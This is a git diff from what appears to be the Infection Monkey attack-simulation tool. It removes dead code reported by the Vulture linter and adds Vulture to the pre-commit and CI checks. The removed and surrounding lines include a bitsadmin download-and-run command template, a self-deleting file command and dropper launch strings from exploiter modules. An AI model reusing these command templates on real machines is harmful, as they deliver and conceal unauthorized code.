Merge branch 'vulture' into develop

Author: mssalvatore

.flake8

@@ -1,7 +1,7 @@
 [flake8]
 ## Warn about linter issues.
 
-exclude = monkey/monkey_island/cc/ui
+exclude = monkey/monkey_island/cc/ui,whitelist.py
 show-source = True
 max-complexity = 10
 max-line-length = 100
@@ -15,4 +15,3 @@ statistics = True
 
 ### --count will print the total number of errors.
 count = True
-

.pre-commit-config.yaml

@@ -48,3 +48,7 @@ repos:
     rev: v0.2
     hooks:
       - id: swimm-verify
+  - repo: https://github.com/jendrikseipp/vulture
+    rev: v2.3
+    hooks:
+      - id: vulture

.travis.yml

@@ -63,6 +63,9 @@ script:
 ## Check that all python is properly formatted. Fail otherwise.
 - python -m black --check .
 
+## Check that there is no dead python code
+- python -m vulture .
+
 ## Run unit tests and generate coverage data
 - cd monkey  # This is our source dir
 - python -m pytest --cov=. # Have to use `python -m pytest` instead of `pytest` to add "{$builddir}/monkey/monkey" to sys.path.

CHANGELOG.md

@@ -27,6 +27,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 - Zerologon exploiter writes runtime artifacts to a secure temporary directory
   instead of $HOME. #1143
 - Authentication mechanism to use bcrypt on server side. #1139
+- Removed relevant dead code as reported by Vulture. #1149
 
 ### Fixed
 - Attempted to delete a directory when monkey config reset was called. #1054

monkey/common/cloud/aws/aws_service.py

@@ -2,7 +2,6 @@
 
 import boto3
 import botocore
-from botocore.exceptions import ClientError
 
 from common.cloud.aws.aws_instance import AwsInstance
 
@@ -53,22 +52,6 @@ def get_client(client_type, region=None):
             client_type, region_name=region if region is not None else AwsService.region
         )
 
-    @staticmethod
-    def get_session():
-        return boto3.session.Session()
-
-    @staticmethod
-    def get_regions():
-        return AwsService.get_session().get_available_regions("ssm")
-
-    @staticmethod
-    def test_client():
-        try:
-            AwsService.get_client("ssm").describe_instance_information()
-            return True
-        except ClientError:
-            return False
-
     @staticmethod
     def get_instances():
         """

monkey/common/cmd/cmd_runner.py

@@ -2,7 +2,6 @@
 import time
 from abc import abstractmethod
 
-from common.cmd.cmd import Cmd
 from common.cmd.cmd_result import CmdResult
 from common.cmd.cmd_status import CmdStatus
 
@@ -36,16 +35,6 @@ class CmdRunner(object):
     def __init__(self, is_linux):
         self.is_linux = is_linux
 
-    def run_command(self, command_line, timeout=DEFAULT_TIMEOUT):
-        """
-        Runs the given command on the remote machine
-        :param command_line: The command line to run
-        :param timeout: Timeout in seconds for command.
-        :return: Command result
-        """
-        c_id = self.run_command_async(command_line)
-        return self.wait_commands([Cmd(self, c_id)], timeout)[1]
-
     @staticmethod
     def run_multiple_commands(instances, inst_to_cmd, inst_n_cmd_res_to_res):
         """

monkey/common/common_consts/system_info_collectors_names.py

@@ -4,4 +4,3 @@
 PROCESS_LIST_COLLECTOR = "ProcessListCollector"
 MIMIKATZ_COLLECTOR = "MimikatzCollector"
 AZURE_CRED_COLLECTOR = "AzureCollector"
-SCOUTSUITE_COLLECTOR = "ScoutSuiteCollector"

monkey/common/utils/attack_utils.py

@@ -42,13 +42,3 @@ class UsageEnum(Enum):
 
 # Dict that describes what BITS job was used for
 BITS_UPLOAD_STRING = "BITS job was used to upload monkey to a remote system."
-
-
-def format_time(time):
-    return "%s-%s %s:%s:%s" % (
-        time.date().month,
-        time.date().day,
-        time.time().hour,
-        time.time().minute,
-        time.time().second,
-    )

monkey/common/utils/exploit_enum.py

@@ -3,5 +3,4 @@
 
 class ExploitType(Enum):
     VULNERABILITY = 1
-    OTHER = 8
     BRUTE_FORCE = 9

monkey/infection_monkey/config.py

@@ -188,7 +188,6 @@ def as_dict(self):
     # exploiters config
     ###########################
 
-    should_exploit = True
     skip_exploit_if_file_exist = False
 
     ms08_067_exploit_attempts = 5

monkey/infection_monkey/example.conf

@@ -1,5 +1,4 @@
 {
-  "should_exploit": true,
   "command_servers": [
     "192.0.2.0:5000"
   ],

monkey/infection_monkey/exploit/sambacry.py

@@ -73,10 +73,6 @@ class SambaCryExploiter(HostExploiter):
     SAMBACRY_MONKEY_FILENAME_32 = "monkey32"
     # Monkey filename on share (64 bit)
     SAMBACRY_MONKEY_FILENAME_64 = "monkey64"
-    # Monkey copy filename on share (32 bit)
-    SAMBACRY_MONKEY_COPY_FILENAME_32 = "monkey32_2"
-    # Monkey copy filename on share (64 bit)
-    SAMBACRY_MONKEY_COPY_FILENAME_64 = "monkey64_2"
     # Supported samba port
     SAMBA_PORT = 445
 
@@ -465,7 +461,6 @@ def create_smb(
         creationDisposition,
         fileAttributes,
         impersonationLevel=SMB2_IL_IMPERSONATION,
-        securityFlags=0,
         oplockLevel=SMB2_OPLOCK_LEVEL_NONE,
         createContexts=None,
     ):

monkey/infection_monkey/exploit/tools/wmi_tools.py

@@ -10,10 +10,6 @@
 LOG = logging.getLogger(__name__)
 
 
-class DceRpcException(Exception):
-    pass
-
-
 class AccessDeniedException(Exception):
     def __init__(self, host, username, password, domain):
         super(AccessDeniedException, self).__init__(

monkey/infection_monkey/exploit/web_rce.py

@@ -25,7 +25,7 @@
     RUN_MONKEY,
     WGET_HTTP_UPLOAD,
 )
-from infection_monkey.network.tools import check_tcp_port, tcp_port_to_service
+from infection_monkey.network.tools import tcp_port_to_service
 from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
 from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
 
@@ -188,13 +188,6 @@ def get_open_service_ports(self, port_list, names):
 
         return valid_ports
 
-    def check_if_port_open(self, port):
-        is_open, _ = check_tcp_port(self.host.ip_addr, port)
-        if not is_open:
-            LOG.info("Port %d is closed on %r, skipping", port, self.host)
-            return False
-        return True
-
     def get_command(self, path, http_path, commands):
         try:
             if "linux" in self.host.os["type"]:
@@ -578,9 +571,6 @@ def get_default_dropper_path(self):
                 LOG.debug("Target's machine type was not set. Using win-32 dropper path.")
         return self._config.dropper_target_path_win_32
 
-    def set_vulnerable_port_from_url(self, url):
-        self.vulnerable_port = HTTPTools.get_port_from_url(url)
-
     def get_target_url(self):
         """
         This method allows "configuring" the way in which a vulnerable URL is picked.

monkey/infection_monkey/model/__init__.py

@@ -17,7 +17,6 @@
     MONKEY_ARG,
 )
 MONKEY_CMDLINE_LINUX = "./%%(monkey_filename)s %s" % (MONKEY_ARG,)
-GENERAL_CMDLINE_LINUX = "(cd %(monkey_directory)s && %(monkey_commandline)s)"
 DROPPER_CMDLINE_DETACHED_WINDOWS = "%s start cmd /c %%(dropper_path)s %s" % (
     CMD_PREFIX,
     DROPPER_ARG,
@@ -26,14 +25,6 @@
     CMD_PREFIX,
     MONKEY_ARG,
 )
-MONKEY_CMDLINE_HTTP = (
-    '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s'
-    '&cmd /c %%(monkey_path)s %s"'
-    % (
-        CMD_PREFIX,
-        MONKEY_ARG,
-    )
-)
 DELAY_DELETE_CMD = (
     "cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & "
     "if not exist %(file_path)s exit)) > NUL 2>&1 "

monkey/infection_monkey/monkey.py

@@ -56,12 +56,10 @@ def __init__(self, args):
         self._default_tunnel = None
         self._args = args
         self._network = None
-        self._dropper_path = None
         self._exploiters = None
         self._fingerprint = None
         self._default_server = None
         self._default_server_port = None
-        self._depth = 0
         self._opts = None
         self._upgrading_to_64 = False
 
@@ -92,7 +90,6 @@ def initialize(self):
 
         self._keep_running = True
         self._network = NetworkScanner()
-        self._dropper_path = sys.argv[0]
 
         if self._default_server:
             if self._default_server not in WormConfiguration.command_servers:

monkey/infection_monkey/monkeyfs.py

@@ -15,7 +15,6 @@ def __init__(self, name, mode="r", buffering=None):
         if not name.startswith(MONKEYFS_PREFIX):
             name = MONKEYFS_PREFIX + name
         self.name = name
-        self._mode = mode
         if name in VirtualFile._vfs:
             super(VirtualFile, self).__init__(self._vfs[name])
         else:

monkey/infection_monkey/network/firewall.py

@@ -31,7 +31,7 @@ def listen_allowed(self, **kwargs):
     def __enter__(self):
         return self
 
-    def __exit__(self, exc_type, value, traceback):
+    def __exit__(self, _exc_type, value, traceback):
         self.close()
 
     def close(self):

monkey/infection_monkey/network/info.py

@@ -2,7 +2,6 @@
 import socket
 import struct
 from random import randint  # noqa: DUO102
-from subprocess import check_output
 
 import netifaces
 import psutil
@@ -157,22 +156,3 @@ def get_interfaces_ranges():
         # limit subnet scans to class C only
         res.append(CidrRange(cidr_range="%s/%s" % (address_str, netmask_str)))
     return res
-
-
-if is_windows_os():
-
-    def get_ip_for_connection(target_ip):
-        return None
-
-
-else:
-
-    def get_ip_for_connection(target_ip):
-        try:
-            query_str = "ip route get %s" % target_ip
-            resp = check_output(query_str.split())
-            substr = resp.split()
-            src = substr[substr.index("src") + 1]
-            return src
-        except Exception:
-            return None